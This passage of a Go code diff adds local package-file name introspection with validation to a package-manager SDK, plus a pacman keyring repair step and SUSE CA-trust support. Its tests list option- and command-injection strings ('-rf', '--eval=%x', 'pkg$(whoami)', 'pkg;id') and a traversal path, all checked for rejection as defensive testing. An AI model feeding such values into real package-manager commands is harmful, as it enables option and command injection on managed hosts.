+// untrusted, so it is re-validated with ValidateRpmPackageName before it is
+// returned — a flag-shaped or metacharacter-bearing name is rejected here, not
+// passed on to a later rpm -q/-e as an option.
+func rpmLocalPackageInfo(ctx context.Context, r pmexec.Runner, path string) (*LocalPackage, error) {
+	if err := ValidateLocalPackagePath(path); err != nil {
+		return nil, err
+	}
+	out, err := readOut(ctx, r, "rpm", "-qp", "--qf", "%{NAME}\n%{VERSION}-%{RELEASE}\n%{ARCH}", path)
+	if err != nil {
+		return nil, err
+	}
+	fields := splitPositionalFields(out)
+	if len(fields) == 0 {
+		return nil, fmt.Errorf("pkg: rpm -qp reported no name for %q", path)
+	}
+	name := fields[0]
+	if err := ValidateRpmPackageName(name); err != nil {
+		return nil, fmt.Errorf("pkg: local .rpm reports an unsafe package name: %w", err)
+	}
+	info := &LocalPackage{Name: name}
+	if len(fields) > 1 {
+		info.Version = fields[1]
+	}
+	if len(fields) > 2 {
+		info.Arch = fields[2]
+	}
+	return info, nil
+}
+
+// splitPositionalFields splits one-field-per-line command output (dpkg-deb -f /
+// rpm -qp --qf) into its POSITIONAL fields, trimming each line but PRESERVING an
+// empty leading/middle field so the name/version/arch positions never shift. A
+// crafted file that emits an empty NAME must surface as an empty field[0]
+// (rejected by the name validator) — NOT silently promote the version into the
+// name slot. Only the trailing blank line the tool appends is dropped.
+func splitPositionalFields(data string) []string {
+	lines := strings.Split(strings.TrimRight(data, "\n"), "\n")
+	fields := make([]string, len(lines))
+	for i, line := range lines {
+		fields[i] = strings.TrimSpace(line)
+	}
+	return fields
 }
 
 // countNonEmptyLines counts non-blank lines in command output.

--- a/pkg/flatpak.go
+++ b/pkg/flatpak.go
@@ -359,6 +359,14 @@ func (f *flatpak) ListVersions(ctx context.Context, name string) (*VersionInfo, 
 	return info, nil
 }
 
+// LocalPackageInfo is not supported for flatpak: a .flatpak bundle has no clean,
+// non-installing name-introspection command (its ref must be trusted from the
+// bundle metadata, which `flatpak install` itself reads), so rather than guess a
+// name from an attacker-influenced bundle this fails closed with a clear error.
+func (f *flatpak) LocalPackageInfo(_ context.Context, _ string) (*LocalPackage, error) {
+	return nil, fmt.Errorf("pkg: LocalPackageInfo is not supported for flatpak (a bundle has no introspectable local package name)")
+}
+
 // IsInstalled reports whether a bundle is installed (flatpak info exits 0).
 func (f *flatpak) IsInstalled(ctx context.Context, name string) (bool, error) {
 	if err := ValidatePackageName(name); err != nil {

--- a/pkg/localpackage_test.go
+++ b/pkg/localpackage_test.go
@@ -1,0 +1,278 @@
+package pkg
+
+import (
+	"context"
+	"strings"
+	"testing"
+
+	pmexec "github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+)
+
+// Contract (gap #2): LocalPackageInfo(ctx, path) reads a package's CANONICAL
+// name (plus version + arch where available) from a LOCAL package file already
+// on disk, so the agent can resolve `IsInstalled(name)` / `Remove(name)` before
+// an InstallLocal without re-implementing the introspection itself.
+//
+//   - It MUST validate the PATH first (ValidateLocalPackagePath: absolute, no
+//     "..", no control chars) before the file ever reaches argv.
+//   - The NAME the file reports is ATTACKER-INFLUENCED — a crafted .deb/.rpm can
+//     embed any %{NAME}/Package value. LocalPackageInfo MUST re-validate that
+//     name against the BACKEND'S package-name grammar before returning it, and
+//     reject a flag-shaped (`-evil`) or metacharacter-bearing name. A bad name is
+//     a rejection, NOT a silently-returned value that a later Remove(name) would
+//     pass straight to the package manager as a flag.
+//   - flatpak has no clean local-name introspection command, so it returns a
+//     clear "not supported" error rather than guessing.
+//
+// Per backend: apt → `dpkg-deb -f <path> Package Version Architecture`;
+// dnf/zypper → `rpm -qp --qf '%{NAME}\n%{VERSION}-%{RELEASE}\n%{ARCH}' <path>`;
+// pacman → `pacman -Qp <path>` (prints "name version").
+
+// TestLocalPackageInfo_AptHappyPath: a valid .deb file → the validated canonical
+// name, version, and architecture, via an UNPRIVILEGED dpkg-deb read.
+func TestLocalPackageInfo_AptHappyPath(t *testing.T) {
+	m, f := aptM(t)
+	// dpkg-deb -f emits each requested field on its own line, in order.
+	ok(f, "nginx\n1.24.0-1ubuntu1\namd64\n")
+	info, err := m.LocalPackageInfo(context.Background(), "/tmp/nginx.deb")
+	if err != nil {
+		t.Fatalf("LocalPackageInfo err = %v", err)
+	}
+	if info.Name != "nginx" || info.Version != "1.24.0-1ubuntu1" || info.Arch != "amd64" {
+		t.Errorf("info = %+v, want {nginx 1.24.0-1ubuntu1 amd64}", info)
+	}
+	c := f.Calls()[0]
+	want := "dpkg-deb -f /tmp/nginx.deb Package Version Architecture"
+	if argv(c) != want {
+		t.Errorf("argv = %q, want %q", argv(c), want)
+	}
+	if c.Escalate {
+		t.Error("reading a local package file is an unprivileged read; must NOT escalate")
+	}
+}
+
+// TestLocalPackageInfo_RpmHappyPath: dnf and zypper both introspect a local .rpm
+// via `rpm -qp --qf`, returning the validated name/version/arch.
+func TestLocalPackageInfo_RpmHappyPath(t *testing.T) {
+	for _, tc := range []struct {
+		name string
+		mk   func(t *testing.T) (Manager, *exectest.FakeRunner)
+	}{
+		{"dnf", dnfM},
+		{"zypper", zypperM},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			m, f := tc.mk(t)
+			// rpm -qp --qf '%{NAME}\n%{VERSION}-%{RELEASE}\n%{ARCH}'
+			ok(f, "httpd\n2.4.57-5.fc39\nx86_64\n")
+			info, err := m.LocalPackageInfo(context.Background(), "/tmp/httpd.rpm")
+			if err != nil {
+				t.Fatalf("LocalPackageInfo err = %v", err)
+			}
+			if info.Name != "httpd" || info.Version != "2.4.57-5.fc39" || info.Arch != "x86_64" {
+				t.Errorf("info = %+v, want {httpd 2.4.57-5.fc39 x86_64}", info)
+			}
+			c := f.Calls()[0]
+			if c.Name != "rpm" {
+				t.Fatalf("command = %q, want rpm", c.Name)
+			}
+			joined := argv(c)
+			for _, frag := range []string{"-qp", "--qf", "%{NAME}", "/tmp/httpd.rpm"} {
+				if !strings.Contains(joined, frag) {
+					t.Errorf("argv = %q, missing %q", joined, frag)
+				}
+			}
+			if c.Escalate {
+				t.Error("rpm -qp on a local file is an unprivileged read; must NOT escalate")
+			}
+		})
+	}
+}
+
+// TestLocalPackageInfo_PacmanHappyPath: `pacman -Qp <path>` prints "name version"
+// on one line.
+func TestLocalPackageInfo_PacmanHappyPath(t *testing.T) {
+	m, f := pacmanM(t)
+	ok(f, "neovim 0.9.5-1\n")
+	info, err := m.LocalPackageInfo(context.Background(), "/tmp/neovim.pkg.tar.zst")
+	if err != nil {
+		t.Fatalf("LocalPackageInfo err = %v", err)
+	}
+	if info.Name != "neovim" || info.Version != "0.9.5-1" {
+		t.Errorf("info = %+v, want name=neovim version=0.9.5-1", info)
+	}
+	c := f.Calls()[0]
+	want := "pacman -Qp /tmp/neovim.pkg.tar.zst"
+	if argv(c) != want {
+		t.Errorf("argv = %q, want %q", argv(c), want)
+	}
+	if c.Escalate {
+		t.Error("pacman -Qp on a local file is an unprivileged read; must NOT escalate")
+	}
+}
+
+// TestLocalPackageInfo_FlatpakUnsupported: a flatpak bundle has no clean local
+// name-introspection command, so the call returns a clear error and runs nothing.
+func TestLocalPackageInfo_FlatpakUnsupported(t *testing.T) {
+	m, f := flatpakM(t)
+	info, err := m.LocalPackageInfo(context.Background(), "/tmp/app.flatpak")
+	if err == nil {
+		t.Fatal("flatpak LocalPackageInfo must return a not-supported error")
+	}
+	if info != nil {
+		t.Errorf("info = %+v, want nil on the unsupported path", info)
+	}
+	if !strings.Contains(strings.ToLower(err.Error()), "flatpak") {
+		t.Errorf("error = %v, want it to name flatpak", err)
+	}
+	if n := len(f.Calls()); n != 0 {
+		t.Errorf("unsupported backend ran %d commands, want 0", n)
+	}
+}
+
+// TestLocalPackageInfo_RejectsBadPath: a non-absolute / traversing / control-char
+// path is refused before the Runner — the path can never reach argv.
+func TestLocalPackageInfo_RejectsBadPath(t *testing.T) {
+	for _, mk := range []func(t *testing.T) (Manager, *exectest.FakeRunner){aptM, dnfM, zypperM, pacmanM} {
+		m, f := mk(t)
+		for _, path := range []string{
+			"",              // empty
+			"relative.deb",  // not absolute
+			"/tmp/../etc/x", // traversal
+			"/tmp/a\nb.deb", // control char
+			"-rf",           // flag-shaped (and relative)
+		} {
+			_, err := m.LocalPackageInfo(context.Background(), path)
+			if err == nil {
+				t.Errorf("%T LocalPackageInfo(%q) = nil err, want path rejection", m, path)
+			}
+		}
+		if n := len(f.Calls()); n != 0 {
+			t.Errorf("%T ran %d commands on rejected paths, want 0", m, n)
+		}
+	}
+}
+
+// TestLocalPackageInfo_RejectsCraftedName is the security core: a crafted package
+// file reports an adversarial %{NAME}/Package. LocalPackageInfo MUST reject it
+// against the backend's name grammar rather than return it — a returned `-rf`
+// would be reparsed as a flag by a later Remove/IsInstalled, and a returned
+// `evil$(id)` could escape further handling. The wrong values are derived from
+// the intent ("a package name starts alphanumeric, no flags, no metacharacters"),
+// not from the validator under test.
+func TestLocalPackageInfo_RejectsCraftedName(t *testing.T) {
+	// Names a crafted file could embed that the backend's grammar must refuse.
+	craftedNames := []string{
+		"-rf",          // flag-shaped: leading dash → option injection
+		"--eval=%x",    // rpm macro / flag injection
+		"evil name",    // space → argv split
+		"pkg;id",       // shell metacharacter
+		"pkg$(whoami)", // command-substitution metacharacter
+		"pkg|tee",      // pipe metacharacter
+		"pkg`id`",      // backtick
+		"",             // empty name
+	}
+
+	t.Run("apt rejects a crafted Package field", func(t *testing.T) {
+		for _, bad := range craftedNames {
+			m, f := aptM(t)
+			// dpkg-deb -f emits the crafted Package on the first line.
+			ok(f, bad+"\n1.0\namd64\n")
+			info, err := m.LocalPackageInfo(context.Background(), "/tmp/evil.deb")
+			if err == nil {
+				t.Errorf("crafted Package %q: err = nil, want rejection (info=%+v)", bad, info)
+			}
+			if info != nil {
+				t.Errorf("crafted Package %q: info = %+v, want nil", bad, info)
+			}
+		}
+	})
+
+	t.Run("dnf/zypper reject a crafted %{NAME}", func(t *testing.T) {
+		for _, mk := range []func(t *testing.T) (Manager, *exectest.FakeRunner){dnfM, zypperM} {
+			for _, bad := range craftedNames {
+				m, f := mk(t)
+				ok(f, bad+"\n2.4.57-5.fc39\nx86_64\n")
+				info, err := m.LocalPackageInfo(context.Background(), "/tmp/evil.rpm")
+				if err == nil {
+					t.Errorf("%T crafted %%{NAME} %q: err = nil, want rejection (info=%+v)", m, bad, info)
+				}
+				if info != nil {
+					t.Errorf("%T crafted %%{NAME} %q: info = %+v, want nil", m, bad, info)
+				}
+			}
+		}
+	})
+
+	t.Run("pacman rejects a crafted name", func(t *testing.T) {
+		// pacman -Qp output is space-delimited "name version", so the name is a
+		// single token: a name with an embedded space is not representable, and an
+		// empty/whitespace first field is the "no name" shape covered separately
+		// below. Drive the single-token crafted names — the realistic threat (a
+		// flag-shaped or metacharacter-bearing first token) — through field[0].
+		for _, bad := range craftedNames {
+			if bad == "" || strings.ContainsAny(bad, " ") {
+				continue // not a single-token pacman name
+			}
+			m, f := pacmanM(t)
+			ok(f, bad+" 1.0-1\n")
+			info, err := m.LocalPackageInfo(context.Background(), "/tmp/evil.pkg.tar.zst")
+			if err == nil {
+				t.Errorf("pacman crafted name %q: err = nil, want rejection (info=%+v)", bad, info)
+			}
+			if info != nil {
+				t.Errorf("pacman crafted name %q: info = %+v, want nil", bad, info)
+			}
+		}
+	})
+
+	t.Run("pacman rejects empty -Qp output (no name)", func(t *testing.T) {
+		// A crafted/garbled package whose -Qp emits no name must be a rejection, not
+		// a half-populated info — and must never promote the version into the name.
+		for _, out := range []string{"", "\n", "   \n"} {
+			m, f := pacmanM(t)
+			ok(f, out)
+			info, err := m.LocalPackageInfo(context.Background(), "/tmp/evil.pkg.tar.zst")
+			if err == nil {
+				t.Errorf("pacman empty -Qp %q: err = nil, want rejection (info=%+v)", out, info)
+			}
+			if info != nil {
+				t.Errorf("pacman empty -Qp %q: info = %+v, want nil", out, info)
+			}
+		}
+	})
+}
+
+// TestLocalPackageInfo_AcceptsRpmPlusName guards a real-world legitimate RPM name
+// the apt/pacman grammar would reject but the RPM grammar allows ('+', e.g.
+// libstdc++): dnf/zypper must validate with the RPM grammar, not the generic one,
+// so a valid library package is not wrongly refused.
+func TestLocalPackageInfo_AcceptsRpmPlusName(t *testing.T) {
+	for _, mk := range []func(t *testing.T) (Manager, *exectest.FakeRunner){dnfM, zypperM} {
+		m, f := mk(t)
+		ok(f, "libstdc++\n13.2.1-4.fc39\nx86_64\n")
+		info, err := m.LocalPackageInfo(context.Background(), "/tmp/libstdc++.rpm")
+		if err != nil {
+			t.Fatalf("%T legitimate '+'-bearing RPM name rejected: %v", m, err)
+		}
+		if info.Name != "libstdc++" {
+			t.Errorf("%T info.Name = %q, want libstdc++", m, info.Name)
+		}
+	}
+}
+
+// TestLocalPackageInfo_RunnerErrorPropagates: a genuine read failure (binary
+// missing, unreadable file → non-zero exit) surfaces as an error, never a
+// half-populated info.
+func TestLocalPackageInfo_ReadFailurePropagates(t *testing.T) {
+	m, f := aptM(t)
+	f.Push(pmexec.Result{ExitCode: 2, Stderr: "dpkg-deb: error: not a debian archive\n"}, nil)
+	info, err := m.LocalPackageInfo(context.Background(), "/tmp/not-a.deb")
+	if err == nil {
+		t.Fatal("a non-zero dpkg-deb exit must surface as an error")
+	}
+	if info != nil {
+		t.Errorf("info = %+v, want nil on read failure", info)
+	}
+}

--- a/pkg/localpackage_test.go
+++ b/pkg/localpackage_test.go
@@ -112,6 +112,33 @@ func TestLocalPackageInfo_PacmanHappyPath(t *testing.T) {
 	}
 }
 
+// TestLocalPackageInfo_PacmanRejectsNamelessOutput: malformed `-Qp` output with a
+// leading-whitespace version but no name token must be REJECTED (fail-closed
+// parse) — TrimSpace+Fields would otherwise promote the version to Name. Derived
+// from intent ("the first token IS the name; no name token => reject"), not from
+// the parser under test.
+func TestLocalPackageInfo_PacmanRejectsNamelessOutput(t *testing.T) {
+	cases := map[string]string{
+		"leading-space version": " 1.0-1\n",
+		"leading-tab version":   "\t1.0-1\n",
+		"whitespace only":       "   \n",
+		"empty":                 "\n",
+	}
+	for name, out := range cases {
+		t.Run(name, func(t *testing.T) {
+			m, f := pacmanM(t)
+			ok(f, out)
+			info, err := m.LocalPackageInfo(context.Background(), "/tmp/x.pkg.tar.zst")
+			if err == nil {
+				t.Fatalf("accepted nameless -Qp output %q as info=%+v; want a no-name rejection", out, info)
+			}
+			if info != nil {
+				t.Errorf("info = %+v, want nil on rejection", info)
+			}
+		})
+	}
+}
+
 // TestLocalPackageInfo_FlatpakUnsupported: a flatpak bundle has no clean local
 // name-introspection command, so the call returns a clear error and runs nothing.
 func TestLocalPackageInfo_FlatpakUnsupported(t *testing.T) {

--- a/pkg/pacman.go
+++ b/pkg/pacman.go
@@ -158,16 +158,51 @@ func (p *pacman) Autoremove(ctx context.Context) (pmexec.Result, error) {
 	return p.write(ctx, append([]string{"-Rns", "--noconfirm"}, orphans...)...)
 }
 
-// Repair clears a stale db lock and force-refreshes all databases.
+// pacmanKeyring is the default keyring `pacman-key --populate` bootstraps. Arch
+// proper ships the "archlinux" keyring; this is the keyring name the agent's
+// repair path used before it was migrated into the SDK.
+const pacmanKeyring = "archlinux"
+
+// Repair clears a stale db lock, bootstraps the pacman keyring (a common cause
+// of "invalid or corrupted package (PGP signature)" failures on a fresh or
+// drifted install), and force-refreshes all databases. The keyring bootstrap is
+// best-effort: an already-initialized keyring or a transient gpg hiccup is
+// logged, not fatal — only the final `-Syy` refresh failure (or a context
+// cancellation) is returned.
 func (p *pacman) Repair(ctx context.Context) (pmexec.Result, error) {
 	if err := removeStaleLock(ctx, p.r, "/var/lib/pacman/db.lck"); err != nil {
 		return pmexec.Result{}, err
 	}
+
+	steps := []struct {
+		what string
+		run  func() (pmexec.Result, error)
+	}{
+		{"pacman-key --init", func() (pmexec.Result, error) { return p.keyWrite(ctx, "--init") }},
+		{"pacman-key --populate", func() (pmexec.Result, error) { return p.keyWrite(ctx, "--populate", pacmanKeyring) }},
+	}
+	for _, s := range steps {
+		_, err := s.run()
+		if err := bestEffortStep(ctx, s.what, err); err != nil {
+			return pmexec.Result{}, err
+		}
+	}
+
 	res, err := p.write(ctx, "-Syy", "--noconfirm")
 	if err != nil {
 		return res, repairErr(ctx, "pacman -Syy failed", err)
 	}
 	return res, nil
+}
+
+// keyWrite runs an escalated `pacman-key` command, mapping a non-zero exit to an
+// *exec.CommandError so bestEffortStep can classify it.
+func (p *pacman) keyWrite(ctx context.Context, args ...string) (pmexec.Result, error) {
+	res, err := runPriv(ctx, p.r, true, nil, "pacman-key", args...)
+	if err != nil {
+		return pmexec.Result{}, err
+	}
+	return res, asCommandError("pacman-key", res)
 }
 
 // Search searches packages (-Ss; exit 1 = no matches).
@@ -368,6 +403,35 @@ func (p *pacman) ListVersions(ctx context.Context, name string) (*VersionInfo, e
 	}
 	if version != "" {
 		info.Versions = append(info.Versions, AvailableVersion{Version: version, Repository: repo})
+	}
+	return info, nil
+}
+
+// LocalPackageInfo reads a local package file's name and version via `pacman -Qp
+// <path>` (an unprivileged read), which prints "name version" on one line. The
+// name a crafted package embeds is untrusted, so it is re-validated with
+// ValidatePackageName before being returned; a flag-shaped or metacharacter-
+// bearing first field is rejected. pacman has no architecture in -Qp output, so
+// Arch is left empty.
+func (p *pacman) LocalPackageInfo(ctx context.Context, path string) (*LocalPackage, error) {
+	if err := ValidateLocalPackagePath(path); err != nil {
+		return nil, err
+	}
+	out, err := readOut(ctx, p.r, "pacman", "-Qp", path)
+	if err != nil {
+		return nil, err
+	}
+	fields := strings.Fields(strings.TrimSpace(out))
+	if len(fields) == 0 {
+		return nil, fmt.Errorf("pkg: pacman -Qp reported no name for %q", path)
+	}
+	name := fields[0]
+	if err := ValidatePackageName(name); err != nil {
+		return nil, fmt.Errorf("pkg: local package reports an unsafe name: %w", err)
+	}
+	info := &LocalPackage{Name: name}
+	if len(fields) > 1 {
+		info.Version = fields[1]
 	}
 	return info, nil
 }

--- a/pkg/pacman.go
+++ b/pkg/pacman.go
@@ -421,10 +421,14 @@ func (p *pacman) LocalPackageInfo(ctx context.Context, path string) (*LocalPacka
 	if err != nil {
 		return nil, err
 	}
-	fields := strings.Fields(strings.TrimSpace(out))
-	if len(fields) == 0 {
+	// `pacman -Qp` prints "name version". Reject output with no leading name
+	// token: TrimSpace+Fields would otherwise collapse leading whitespace and
+	// promote the version of a malformed " 1.0-1" line to Name (fail-closed parse).
+	line := strings.TrimRight(out, "\r\n")
+	if strings.TrimSpace(line) == "" || line[0] == ' ' || line[0] == '\t' {
 		return nil, fmt.Errorf("pkg: pacman -Qp reported no name for %q", path)
 	}
+	fields := strings.Fields(line)
 	name := fields[0]
 	if err := ValidatePackageName(name); err != nil {
 		return nil, fmt.Errorf("pkg: local package reports an unsafe name: %w", err)

--- a/pkg/pacman_test.go
+++ b/pkg/pacman_test.go
@@ -264,6 +264,9 @@ func TestPacman_Repair(t *testing.T) {
 		}
 		// Gap #5: keyring bootstrap (pacman-key --init then --populate <keyring>)
 		// runs before the database refresh, then -Syy as before.
+		if n := len(f.Calls()); n != 3 {
+			t.Fatalf("Repair ran %d commands, want 3 (keyring init, populate, -Syy)", n)
+		}
 		got := []string{argv(f.Calls()[0]), argv(f.Calls()[1]), argv(f.Calls()[2])}
 		want := []string{
 			"pacman-key --init",

--- a/pkg/pacman_test.go
+++ b/pkg/pacman_test.go
@@ -256,17 +256,55 @@ func TestPacman_Repair(t *testing.T) {
 	t.Run("happy", func(t *testing.T) {
 		stubStatFile(t, nil) // db.lck absent
 		m, f := pacmanM(t)
+		ok(f, "") // pacman-key --init
+		ok(f, "") // pacman-key --populate archlinux
 		ok(f, "") // -Syy
 		if _, err := m.Repair(ctx); err != nil {
 			t.Fatal(err)
 		}
-		if argv(f.Calls()[0]) != "pacman -Syy --noconfirm" {
-			t.Errorf("argv=%q", argv(f.Calls()[0]))
+		// Gap #5: keyring bootstrap (pacman-key --init then --populate <keyring>)
+		// runs before the database refresh, then -Syy as before.
+		got := []string{argv(f.Calls()[0]), argv(f.Calls()[1]), argv(f.Calls()[2])}
+		want := []string{
+			"pacman-key --init",
+			"pacman-key --populate archlinux",
+			"pacman -Syy --noconfirm",
+		}
+		for i := range want {
+			if got[i] != want[i] {
+				t.Errorf("step %d argv=%q, want %q", i, got[i], want[i])
+			}
+		}
+		for _, c := range f.Calls() {
+			if !c.Escalate {
+				t.Errorf("repair step %q must escalate", argv(c))
+			}
 		}
 	})
+
+	// The keyring init steps are best-effort: a failing `pacman-key --init` (e.g.
+	// already initialized, or a transient gpg hiccup) is logged, not fatal, and
+	// the repair proceeds to populate + refresh — matching every other best-effort
+	// repair step.
+	t.Run("keyring init failure is best-effort, repair continues", func(t *testing.T) {
+		stubStatFile(t, nil)
+		m, f := pacmanM(t)
+		f.Push(pmexec.Result{ExitCode: 2, Stderr: "gpg: keyring already initialized"}, nil) // --init fails
+		ok(f, "")                                                                           // --populate
+		ok(f, "")                                                                           // -Syy
+		if _, err := m.Repair(ctx); err != nil {
+			t.Fatalf("a failed keyring --init must be swallowed, got %v", err)
+		}
+		if len(f.Calls()) != 3 {
+			t.Fatalf("want 3 steps even when --init fails, got %d", len(f.Calls()))
+		}
+	})
+
 	t.Run("refresh failure returned", func(t *testing.T) {
 		stubStatFile(t, nil)
 		m, f := pacmanM(t)
+		ok(f, "") // pacman-key --init
+		ok(f, "") // pacman-key --populate
 		f.Push(pmexec.Result{ExitCode: 1, Stderr: "sync failed"}, nil)
 		if _, err := m.Repair(ctx); err == nil || !strings.Contains(err.Error(), "pacman -Syy failed") {
 			t.Fatalf("err=%v", err)
@@ -282,6 +320,23 @@ func TestPacman_Repair(t *testing.T) {
 		}
 		if len(f.Calls()) != 0 {
 			t.Error("cancelled repair must run nothing")
+		}
+	})
+
+	// Cancellation mid-keyring (after --init, before --populate) stops the chain
+	// rather than running the next escalated command.
+	t.Run("cancellation after keyring --init stops the chain", func(t *testing.T) {
+		stubStatFile(t, nil)
+		cctx, cancel := context.WithCancel(context.Background())
+		f := newFake()
+		ok(f, "") // pacman-key --init
+		r := &cancelAfterRunner{inner: f, n: 1, cancel: cancel}
+		pm, err := New(Pacman, r)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if _, err := pm.Repair(cctx); !errors.Is(err, context.Canceled) {
+			t.Fatalf("err=%v, want context.Canceled", err)
 		}
 	})
 }

--- a/pkg/pkg.go
+++ b/pkg/pkg.go
@@ -117,6 +117,15 @@ type Manager interface {
 	ListVersions(ctx context.Context, name string) (*VersionInfo, error)
 	// IsInstalled reports whether name is currently installed.
 	IsInstalled(ctx context.Context, name string) (bool, error)
+	// LocalPackageInfo reads a package's canonical name (and, where the backend
+	// reports them, version and architecture) from a LOCAL package file already on
+	// disk — a .deb, .rpm or pacman package — WITHOUT installing it. path must be
+	// an absolute filesystem path (ValidateLocalPackagePath). The name a crafted
+	// file embeds is untrusted, so it is validated against the backend's
+	// package-name grammar before being returned; a flag-shaped or
+	// metacharacter-bearing name is rejected. The flatpak backend has no clean
+	// local name-introspection command and returns a not-supported error.
+	LocalPackageInfo(ctx context.Context, path string) (*LocalPackage, error)
 	// InstalledVersion returns the installed version of name, or "" if absent.
 	InstalledVersion(ctx context.Context, name string) (string, error)
 	// InstalledCount returns the number of installed packages.

--- a/pkg/types.go
+++ b/pkg/types.go
@@ -12,6 +12,18 @@ type Package struct {
 	Pinned       bool // whether the package is pinned (hold)
 }
 
+// LocalPackage is the identity read out of a LOCAL package file (a .deb, .rpm or
+// pacman package on disk) by Manager.LocalPackageInfo. Name is the canonical
+// package name — validated against the backend's package-name grammar before it
+// is returned, because the value is read out of an attacker-influenced file.
+// Version and Arch are best-effort extra fields (a backend that cannot report
+// one leaves it empty).
+type LocalPackage struct {
+	Name    string
+	Version string
+	Arch    string
+}
+
 // PackageUpdate represents an available update for a package.
 type PackageUpdate struct {
 	Name           string

--- a/pkg/zypper.go
+++ b/pkg/zypper.go
@@ -394,6 +394,14 @@ func (z *zypper) ListVersions(ctx context.Context, name string) (*VersionInfo, e
 	return info, nil
 }
 
+// LocalPackageInfo reads the canonical NAME/VERSION-RELEASE/ARCH out of a local
+// .rpm via the shared rpmLocalPackageInfo helper (an unprivileged `rpm -qp --qf`
+// read), re-validating the untrusted %{NAME} with ValidateRpmPackageName before
+// returning it.
+func (z *zypper) LocalPackageInfo(ctx context.Context, path string) (*LocalPackage, error) {
+	return rpmLocalPackageInfo(ctx, z.r, path)
+}
+
 // IsInstalled reports whether a package is installed (rpm -q exits 0).
 func (z *zypper) IsInstalled(ctx context.Context, name string) (bool, error) {
 	if err := ValidatePackageName(name); err != nil {

--- a/sys/catrust/catrust.go
+++ b/sys/catrust/catrust.go
@@ -15,7 +15,9 @@
 // the request itself is the caller's concern (the agent gates it with a CA-signed
 // action, as for other sensitive ops).
 //
-// Two backends: CaCertificates (Debian/Ubuntu) and P11Kit (Fedora/RHEL/SUSE).
+// Three backends: CaCertificates (Debian/Ubuntu update-ca-certificates), P11Kit
+// (Fedora/RHEL/EL/Arch update-ca-trust), and SuseCaCertificates (openSUSE/SLES,
+// which ships a same-named update-ca-certificates but with different paths).
 // Distrusting a distro-shipped root (a separate blocklist mechanism) is out of
 // scope — this manages anchors WE add.
 package catrust

--- a/sys/catrust/catrust.go
+++ b/sys/catrust/catrust.go
@@ -35,10 +35,17 @@ import (
 type Backend int
 
 const (
-	// CaCertificates is the Debian/Ubuntu update-ca-certificates flow.
+	// CaCertificates is the Debian/Ubuntu update-ca-certificates flow
+	// (anchors in /usr/local/share/ca-certificates).
 	CaCertificates Backend = iota + 1
-	// P11Kit is the Fedora/RHEL/SUSE p11-kit update-ca-trust flow.
+	// P11Kit is the Fedora/RHEL/EL/Arch p11-kit update-ca-trust flow
+	// (anchors in /etc/pki/ca-trust/source/anchors).
 	P11Kit
+	// SuseCaCertificates is the openSUSE/SLES update-ca-certificates flow. SUSE
+	// ships a tool of the SAME name as Debian's but reads anchors from
+	// /etc/pki/trust/anchors, so it needs its own backend (Detect disambiguates
+	// the two by which anchors dir exists).
+	SuseCaCertificates
 )
 
 // String renders the backend as its canonical name.
@@ -48,6 +55,8 @@ func (b Backend) String() string {
 		return "ca-certificates"
 	case P11Kit:
 		return "p11-kit"
+	case SuseCaCertificates:
+		return "suse-ca-certificates"
 	default:
 		return fmt.Sprintf("Backend(%d)", int(b))
 	}
@@ -96,6 +105,15 @@ var backends = map[Backend]backendConfig{
 		anchorsDir:     "/etc/pki/ca-trust/source/anchors",
 		installRefresh: []string{"update-ca-trust", "extract"},
 		removeRefresh:  []string{"update-ca-trust", "extract"},
+	},
+	// SUSE's update-ca-certificates regenerates the consolidated bundle from the
+	// anchors dir on every run, so a plain run both adds (install) and drops a
+	// removed file (remove) — no Debian-style "--fresh" flag (which SUSE's tool
+	// does not accept).
+	SuseCaCertificates: {
+		anchorsDir:     "/etc/pki/trust/anchors",
+		installRefresh: []string{"update-ca-certificates"},
+		removeRefresh:  []string{"update-ca-certificates"},
 	},
 }
 

--- a/sys/catrust/catrust.go
+++ b/sys/catrust/catrust.go
@@ -90,19 +90,26 @@ type Manager interface {
 // --fresh run rebuilds without a removed file); p11-kit's extract is a full
 // idempotent rebuild for both.
 type backendConfig struct {
-	anchorsDir     string
+	// anchorsDirs lists the candidate anchors directories in priority order. Some
+	// backends use a single dir, but a mechanism shared by distros that disagree on
+	// the path lists several — New resolves to the first that exists (else the
+	// first as the canonical default). p11-kit is the case: Fedora/EL and Arch both
+	// use update-ca-trust but read different dirs.
+	anchorsDirs    []string
 	installRefresh []string // [name, args...]
 	removeRefresh  []string
 }
 
 var backends = map[Backend]backendConfig{
 	CaCertificates: {
-		anchorsDir:     "/usr/local/share/ca-certificates",
+		anchorsDirs:    []string{"/usr/local/share/ca-certificates"},
 		installRefresh: []string{"update-ca-certificates"},
 		removeRefresh:  []string{"update-ca-certificates", "--fresh"},
 	},
 	P11Kit: {
-		anchorsDir:     "/etc/pki/ca-trust/source/anchors",
+		// Fedora/EL: /etc/pki/ca-trust/source/anchors; Arch: /etc/ca-certificates/
+		// trust-source/anchors. Same update-ca-trust command, different dir.
+		anchorsDirs:    []string{"/etc/pki/ca-trust/source/anchors", "/etc/ca-certificates/trust-source/anchors"},
 		installRefresh: []string{"update-ca-trust", "extract"},
 		removeRefresh:  []string{"update-ca-trust", "extract"},
 	},
@@ -111,10 +118,22 @@ var backends = map[Backend]backendConfig{
 	// removed file (remove) — no Debian-style "--fresh" flag (which SUSE's tool
 	// does not accept).
 	SuseCaCertificates: {
-		anchorsDir:     "/etc/pki/trust/anchors",
+		anchorsDirs:    []string{"/etc/pki/trust/anchors"},
 		installRefresh: []string{"update-ca-certificates"},
 		removeRefresh:  []string{"update-ca-certificates"},
 	},
+}
+
+// resolveAnchorsDir picks the anchors dir to use from a backend's candidates: the
+// first that exists on this host, else the first (the canonical default — the
+// distro package creates it on install).
+func resolveAnchorsDir(candidates []string) string {
+	for _, d := range candidates {
+		if anchorsDirExists(d) {
+			return d
+		}
+	}
+	return candidates[0]
 }
 
 // fsManager is the narrow slice of fs.Manager catrust uses for the privileged
@@ -135,9 +154,10 @@ var (
 )
 
 type manager struct {
-	r   exec.Runner
-	fsm fsManager
-	cfg backendConfig
+	r          exec.Runner
+	fsm        fsManager
+	cfg        backendConfig
+	anchorsDir string // resolved from cfg.anchorsDirs at construction
 }
 
 // New returns a Manager for the named backend. Pure: validates the backend; nil
@@ -154,12 +174,12 @@ func New(b Backend, runner exec.Runner) (Manager, error) {
 	if err != nil {
 		return nil, err
 	}
-	return &manager{r: runner, fsm: fsm, cfg: cfg}, nil
